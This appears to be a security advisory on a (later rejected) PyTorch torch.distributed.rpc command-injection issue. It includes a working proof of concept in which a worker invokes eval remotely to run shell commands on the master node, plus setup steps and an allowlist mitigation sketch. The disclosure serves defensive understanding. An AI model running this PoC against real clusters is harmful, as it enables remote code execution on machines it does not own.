Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
There is no fixed version for torch.
This was deemed not a vulnerability.
torch provides tensors and dynamic neural networks in Python with strong GPU acceleration.
Affected versions of this package are vulnerable to Arbitrary Command Injection through the torch.distributed.rpc framework due to missing function validation during RPC calls. An attacker can execute arbitrary commands by leveraging built-in Python functions such as eval during multi-CPU RPC communication.
Note: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.
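The attack primitive rests on the fact that Python serializes built-in functions by reference, so a callable like eval survives the serialization round-trip between worker and master intact. A minimal sketch of this mechanic, using plain pickle as a stand-in for the RPC layer's serialization (not torch's actual wire format):

```python
import pickle

# Built-in functions pickle by fully-qualified name, not by value...
payload = pickle.dumps(eval)

# ...so the receiving side reconstructs the real eval and can call it
# with attacker-chosen arguments.
func = pickle.loads(payload)
print(func("1 + 1"))  # prints 2
```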
Set up master and worker nodes. Each node must set the following environment variables to enable network communication between nodes.
export MASTER_ADDR=10.206.0.3
export MASTER_PORT=29500
export TP_SOCKET_IFNAME=eth0
export GLOO_SOCKET_IFNAME=eth0
On the master (10.206.0.3), start the RPC service by calling the init_rpc function. The master will then listen on 0.0.0.0:MASTER_PORT, which is used to communicate with each node in the network.
import torch
import torch.distributed.rpc as rpc

def add(a, b):
    return a + b

rpc.init_rpc("master", rank=0, world_size=2)
rpc.shutdown()
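Conceptually, rpc.rpc_sync delivers a callable plus arguments to the remote side, which simply invokes it. The toy stand-in below (fake_rpc_sync is a hypothetical helper, not torch's API) makes concrete why the absence of validation matters:

```python
def fake_rpc_sync(func, args):
    # Toy stand-in for rpc.rpc_sync: the receiving side invokes whatever
    # callable it was handed -- no validation is performed.
    return func(*args)

def add(a, b):
    return a + b

# Intended use: a developer-defined function runs on the remote side.
print(fake_rpc_sync(add, (2, 3)))        # prints 5

# But nothing restricts the callable to developer-defined functions:
print(fake_rpc_sync(eval, ("1 + 1",)))   # prints 2
```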
On the worker, first establish the RPC protocol with the master by calling init_rpc. It is then possible to communicate with the master through rpc.rpc_sync for RPC function invocations. Due to the lack of security filtering in torch.distributed.rpc, workers can execute built-in Python functions such as eval on the master node through RPC, even though these functions are not intentionally exposed by the developer. This leads to remote code execution on the master node, potentially compromising it.
import torch
import torch.distributed.rpc as rpc

rpc.init_rpc("worker", rank=1, world_size=2)
ret = rpc.rpc_sync("master", eval, args=('__import__("os").system("id;ifconfig")',))
print(ret)
rpc.shutdown()
The following torchrun commands start the master and worker separately; alternatively, python3 master.py and python3 worker.py can be run directly.
for master: torchrun --nproc_per_node=1 --nnodes=2 --node_rank=0 --master_addr=10.206.0.3 --master_port=29500 master.py
for worker: torchrun --nproc_per_node=1 --nnodes=2 --node_rank=1 --master_addr=10.206.0.3 --master_port=29500 worker.py
As a result, the worker exploited the vulnerability to call built-in Python functions such as eval on the master and execute arbitrary commands such as os.system("id;ifconfig"). In the test screenshot, the IP displayed after command execution is 10.206.0.3, confirming that the command ran on the master.
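Since there is no fixed version, a deployment that must run torch.distributed.rpc across trust boundaries could wrap remote dispatch in an allowlist check. The guard below is an illustrative sketch only (safe_dispatch and ALLOWED are hypothetical names, not torch APIs):

```python
ALLOWED = {"add"}  # example: names of explicitly registered RPC-callable functions

def safe_dispatch(func, args):
    # Reject builtins (eval, exec, ...) and anything not explicitly allowlisted.
    name = getattr(func, "__name__", None)
    if getattr(func, "__module__", None) == "builtins" or name not in ALLOWED:
        raise PermissionError(f"RPC call to {name!r} is not permitted")
    return func(*args)

def add(a, b):
    return a + b

print(safe_dispatch(add, (2, 3)))  # permitted: prints 5
try:
    safe_dispatch(eval, ("__import__('os').system('id')",))
except PermissionError as e:
    print(e)  # eval is blocked before it can run
```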